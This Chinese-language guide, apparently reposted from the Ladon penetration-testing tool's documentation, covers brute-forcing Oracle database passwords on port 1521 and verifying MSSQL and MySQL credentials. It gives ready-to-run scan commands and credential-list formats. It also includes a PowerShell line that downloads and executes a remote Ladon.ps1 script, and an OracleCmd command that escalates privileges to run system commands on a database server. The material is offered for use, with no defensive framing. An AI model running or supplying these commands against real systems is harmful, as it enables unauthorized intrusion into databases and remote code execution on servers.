<% Visit %>
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1521端口 Oracle数据库密码爆破
Oracle不同于MS SQL Server和Mysql数据库,可对用户配置权限
数据库名不对,是无法连接上数据库的,比方说你获取到的密码
是oracle admin123 只允许连接db888数据库 就是所说的SID
但是网上很多工具都是使用默认的orcl数据库 导致无法爆破
有可能会因此错过很多Oracle数据库机器权限
PS:SQL Server不指定数据库名也可以连 权限不够最多读取不了对应库的数据而已
但是填写默认的master库,即使是最低权限,也可连接上,就可用来验证爆破密码
而Oracle不行,填写默认的orcl,非授权用户是连不上的 不指定时Ladon默认跑orcl
1 | Ladon 192.168.1.8/24 OracleScan |
配置密码爆破参数
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
4 Oracle数据库,需要放个sid.txt里面存放数据库名称,Ladon先检测数据库存在才爆破
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
数据库口令检测
数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行
mssql密码验证
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
oracle同理
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan
mysql无需指定数据库名
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan
PowerLadon
远程加载OracleScan 1521端口弱口令爆破
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 OracleScan”
Kali、Linux、Mac、路由器等操作系统
./Ladon 192.168.1.8/24 OracleScan
Oracle数据库远程提权工具
12.15
[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置
Ladon 12.2 12.14
[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权
支持Windows/Linux/MacOS等服务器操作系统
支持高版本Oracle 12G、11G、12G及之前版本
GUI版 填写用户密码 Oracle一键提权远程执行命令
1 | Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m3 whoami |
工具下载
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
如有侵权请联系:admin#unsafe.sh